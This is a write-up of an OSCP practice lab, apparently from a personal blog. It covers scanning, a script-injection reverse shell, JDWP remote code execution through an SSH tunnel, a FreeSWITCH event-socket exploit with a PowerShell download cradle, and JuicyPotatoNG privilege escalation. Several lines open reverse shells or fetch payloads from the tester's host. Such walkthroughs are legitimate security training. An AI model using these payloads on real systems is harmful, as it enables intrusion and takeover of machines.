OSCP-OSCP B
192.168.226.150
NMAP
1
2
3PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8080/tcp open http-proxy syn-ackdirsearch
1
2
3
4
5
6
7[15:19:00] 400 - 800B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[15:19:03] 400 - 800B - /a%5c.aspx
[15:19:50] 200 - 194B - /CHANGELOG
[15:20:09] 500 - 105B - /error
[15:20:10] 500 - 105B - /error/
[15:20:12] 200 - 946B - /favicon.ico
[15:21:09] 200 - 25B - /search透過CHANGELOG知道存在command text
search頁面可觸發payload
1
2
3
4
5# 調用runtime.exec payload
${script:javascript:java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.45.172/443 0>&1")}
%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fbash%20-c%20%24%40%7Cbash%200%20echo%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.45.172%2F443%200%3E%261%22%29%7Dnetstat -antp 發現本機8000 port
1
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTENps aux 確定一下8000 port
1
root 852 0.0 1.7 2528964 35144 ? Ssl 07:13 0:00 java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.javaApp.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.ServerSocket;
import java.net.Socket;
class StatsApp {
public static void main(String[] args) {
System.out.println("System Stats\n");
Runtime rt = Runtime.getRuntime();
String output = new String();
try {
ServerSocket echod = new ServerSocket(5000);
while (true) {
output = "";
output += "Available Processors: " + rt.availableProcessors() +"\r\n";
output += "Free Memory: " + rt.freeMemory() + "\r\n";
output += "Total Memory: " + rt.totalMemory() +"\r\n";
Socket socket = echod.accept();
InputStream in = socket.getInputStream();
OutputStream out = socket.getOutputStream();
out.write((output + "\r\n").getBytes());
System.out.println(output);
}
} catch (IOException e) {
System.err.println(e.toString());
System.exit(1);
}
}
}ssh tunnel
1
ssh -nNTR 1234:127.0.0.1:8000 giwawa@192.168.45.172JDWP RCE
1
2
3
4
5
6
7python2 jdwp-shellifier.py -t 127.0.0.1 -p 1234 --cmd "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3Mi80NDMgMD4mMQ==}|{base64,-d}|{bash,-i}"
# 觸發5000 port
nc -nv 192.168.226.150 5000
# 監聽
nc -lvnp 443
FLAG
1 | |
192.168.226.149
- NMAP
1
2
3
4PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
192.168.226.151
NMAP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: OSCP
| NetBIOS_Domain_Name: OSCP
| NetBIOS_Computer_Name: OSCP
| DNS_Domain_Name: OSCP
| DNS_Computer_Name: OSCP
| Product_Version: 10.0.19041
|_ System_Time: 2023-11-01T09:29:13+00:00
| ssl-cert: Subject: commonName=OSCP
| Issuer: commonName=OSCP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-31T07:15:26
| Not valid after: 2024-05-01T07:15:26
| MD5: d4f8ef9790d05fe5b6f60e2632144d83
| SHA-1: 82b0d6a831f86f6392690f49898d65a65fb2e50e
|_ssl-date: 2023-11-01T09:29:18+00:00; 0s from scanner time.
5060/tcp open sip-proxy syn-ack FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5080/tcp open sip-proxy syn-ack FreeSWITCH mod_sofia 1.10.1~64bit
7443/tcp open ssl/websocket syn-ack (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-10-28T14:47:12
| Not valid after: 1986-09-04T08:18:56
| MD5: e3d31a79bff35962afd78cebff133ab1
| SHA-1: cab027d5cfbf62cf882c0ca77a6ee9f9b9082ae8
8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
8081/tcp open websocket syn-ack (WebSocket version: 13)
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
|_mcafee-epo-agent: ePO Agent not found
8082/tcp open ssl/websocket syn-ack (WebSocket version: 13)
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Issuer: commonName=FreeSWITCH/countryName=US
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-10-28T14:47:12
| Not valid after: 1986-09-04T08:18:56
| MD5: e3d31a79bff35962afd78cebff133ab1
| SHA-1: cab027d5cfbf62cf882c0ca77a6ee9f9b9082ae8
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s8021 port 存在RCE
1
2
3# FreeSWITCH 1.10.1 - Command Execution
python3 exp.py 192.168.226.151 "powershell -nop -ep bypass -C IEX(new-object system.net.webclient).downloadstring('http://192.168.45.172/shell.ps1')"systeminfo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51Host Name: OSCP
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: chris
Registered Organization:
Product ID: 00331-10000-00001-AA613
Original Install Date: 10/31/2022, 12:36:15 PM
System Boot Time: 7/11/2023, 10:58:12 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21100432.B64.2301110304, 1/11/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 6,143 MB
Available Physical Memory: 4,550 MB
Virtual Memory: Max Size: 7,807 MB
Virtual Memory: Available: 6,207 MB
Virtual Memory: In Use: 1,600 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 11 Hotfix(s) Installed.
[01]: KB5020613
[02]: KB4562830
[03]: KB4570334
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB5000736
[08]: KB5012170
[09]: KB5018410
[10]: KB5014032
[11]: KB5016705
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 192.168.226.151
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.JuicyPotato
1
JuicyPotatoNG.exe -l 1337 -t * -p shell.exe
FLAG
1 | |
OSCP-OSCP B
https://luoming1995125.github.io/2023/11/01/OSCP-OSCPB/